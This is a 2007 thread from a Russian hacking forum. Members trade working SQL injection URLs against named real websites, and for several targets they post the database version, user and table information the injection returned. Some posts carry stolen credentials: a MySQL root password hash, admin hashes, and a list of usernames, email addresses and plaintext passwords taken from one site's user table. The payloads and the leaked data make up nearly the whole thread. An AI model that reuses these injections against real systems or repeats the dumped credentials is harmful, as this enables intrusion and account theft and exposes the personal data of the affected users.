HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2007, 17:37
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Код:
http://www.puntoinformatico.it/download/file.asp?file_id=1+or+1=(SELECT+TOP+1+cast(Nickname+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+Utenti+where+ID_Prov=1)--
 
Ответить с цитированием

  #2  
Старый 29.11.2007, 18:35
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию

ENFIX, http://forum.antichat.ru/showpost.php?p=515305&postcount=3904

edu

Код:
http://www.choices.edu/resources/detail.php?id=-49+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
4.1.14-log:choices@charlie.services.brown.edu:Choices

Последний раз редактировалось Fata1ex; 29.11.2007 в 18:54..
 
Ответить с цитированием

  #3  
Старый 29.11.2007, 19:34
mtn
Новичок
Регистрация: 12.12.2006
Сообщений: 22
С нами: 10216669

Репутация: 18
По умолчанию

Код:
http://www.emz-hanauer.de/public_main_modul.php?page_id=-1+union+select+1,user.usrname+from+mysql.user/*
Код:
Access denied for user 'db159514_2'@'127.0.0.2' to database 'mysql'
 
Ответить с цитированием

  #4  
Старый 29.11.2007, 19:50
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию

PR:5

Код:
http://www.mgnsw.org.au/museums_and_galleries.php?id=-16+union+select+1,2,3,4,5,6/*
mgnsw@localhost:4.1.20:mgnsw


PR:5

Код:
http://www.churchilltrust.com.au/content.php?id=-54+union+select+1,2,3,convert(concat_ws(char(58),version(),user(),database())+using%20latin1),5,6,7,8,9,10,11/*
winston@localhost:4.1.11-Debian_4sarge7:churchilltrust



PR:5

Код:
http://www.wormweb.nl/agenda.php?id=-1+union+select+aes_decrypt(aes_encrypt(user,0x71),0x71)+from+users/*
wormweb@localhost:4.1.12-Debian_0.dotdeb.0-log:wormweb01
 
Ответить с цитированием

edu
  #5  
Старый 29.11.2007, 22:03
Underwit
Banned
Регистрация: 06.10.2006
Сообщений: 288
С нами: 10313060

Репутация: 469
По умолчанию edu

Цитата:
http://lapa.princeton.edu/peopledetail.php?ID=-1+union+select+1,2,3,4,user,password,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39+from+mysql.user/*
MySql5 hash
root *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3
 
Ответить с цитированием

  #6  
Старый 29.11.2007, 20:00
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

spblove.ru

http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,cast(version()+as+ binary),cast(database()+as+binary),cast(user()+as+ binary))/*

4.1.11-Debian_4sarge2-log/spblove8_main/spblove8_main@85.249.135.4


http://www.spblove.ru/mistakes.php?id=-1+union+select+1,concat_ws(0x2F,login,password,icq )+from+ankets+limit+1300,1/*

логин/хеш/уин
-----------------------------------------------------------------------------

http://www.happywedding.ru/ladies_details.php?recordID=-1+UNION+SELECT+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1,1/*

4.1.22-lk-log/hapwru_lady/hapwru_lady@localhost
--------------------------------------------------------------------------

http://www.prosex.com.ua/news/show.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22/prosex/prosex@localhost

--------------------------------------------------------------------------
http://news.13rus.ru/?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6/*

4.1.22-standard/vitaliy_13rus/vitaliy_13rus@localhost

--------------------------------------------------------------------------
ecoby.info

http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),da tabase(),user()),6,7,8,9,10,11,12,13,14/*

4.1.21-standard-log/ecobyin_iac/ecobyin_User@localhost


http://www.ecoby.info/index.php?page=measure&src=main&mid=-1+union+select+1,2,3,4,5,concat_ws(0x2F,ulogin,upa ss,umail),7,8,9,10,11,12,13,14+from+users/*

логин/хеш/мейл
 
Ответить с цитированием

  #7  
Старый 29.11.2007, 20:59
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

http://www.privacyconference2006.co.uk/

Код:
http://www.privacyconference2006.co.uk/index.asp?PageID=-1+union+select+version(),2/*
Не смог подобрать таблицы...
 
Ответить с цитированием

  #8  
Старый 29.11.2007, 21:10
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами: 10216668

Репутация: 930


По умолчанию

PR:3

Код:
http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),user(),version(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
sr0291893@81.31.99.13:5.0.45-log:sr0291893

Код:
http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+limit+24,1/*
shiznit_users

Код:
http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,column_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.columns+where+table_name='shiznit_users'+limit+1,1/*
nickname : email : password : id

Код:
http://www.theshiznit.co.uk/review.php?id=-242+union+select+1,2,3,4,concat_ws(char(58),nickname,email,password,id),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+shiznit_users/*
Код:
Bob:andy@mrhunt.co.uk:shiznitgod:1
andy:andy:12345:8
Pandaemonium:richardjamesbacon@btinternet.co.uk:preacher:10
thefuckestuppest:moshpit@grungefans.co.uk:wolf359:11
blamfish:bianconeri@gmail.com:kamikaze:12
monkey_man:lukewhiston@hotmail.com:monkeyman:13
Geffdof:jeffbeynon@hotmail.com:kennym:14
...

PR:4

Код:
http://www.lunarenergy.co.uk/newsDetail.php?id=-12+union+select+1,2,3,4,5,convert(concat_ws(char(58),version(),user(),database())using%20latin1),7/*
4.1.12-log:steve@64.57.64.164:sca

Последний раз редактировалось Fata1ex; 29.11.2007 в 21:18..
 
Ответить с цитированием

  #9  
Старый 29.11.2007, 21:51
.Begemot.
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
С нами: 10065986

Репутация: 785
По умолчанию

Код HTML:
http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,5,6,7,8,9,10,11/*&item=galleries
Код HTML:
http://lada.cc/image.phtml?id=9999+union+select+0,1,2,3,4,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a,id,0x3a,login,0x3a,password),6,7,8,9,10,11+from+adm_users/*&item=galleries
Admin
login: BG
password (hash): 7fd6766a2eef757f37d022422fe8aff5

Последний раз редактировалось trumps; 29.11.2007 в 21:57..
 
Ответить с цитированием

  #10  
Старый 29.11.2007, 22:13
Ded MustD!e
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами: 9851426

Репутация: 3908
По умолчанию

Код:
http://www.minneapolisparks.org/default.asp?PageID=4&parkid=1+or+1=(SELECT+TOP+1+cast(LOGON_ID+as+nvarchar)%2B%27%3A%27%2Bcast(Password+as+nvarchar)+from+users+where+USER_ID=2)--
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.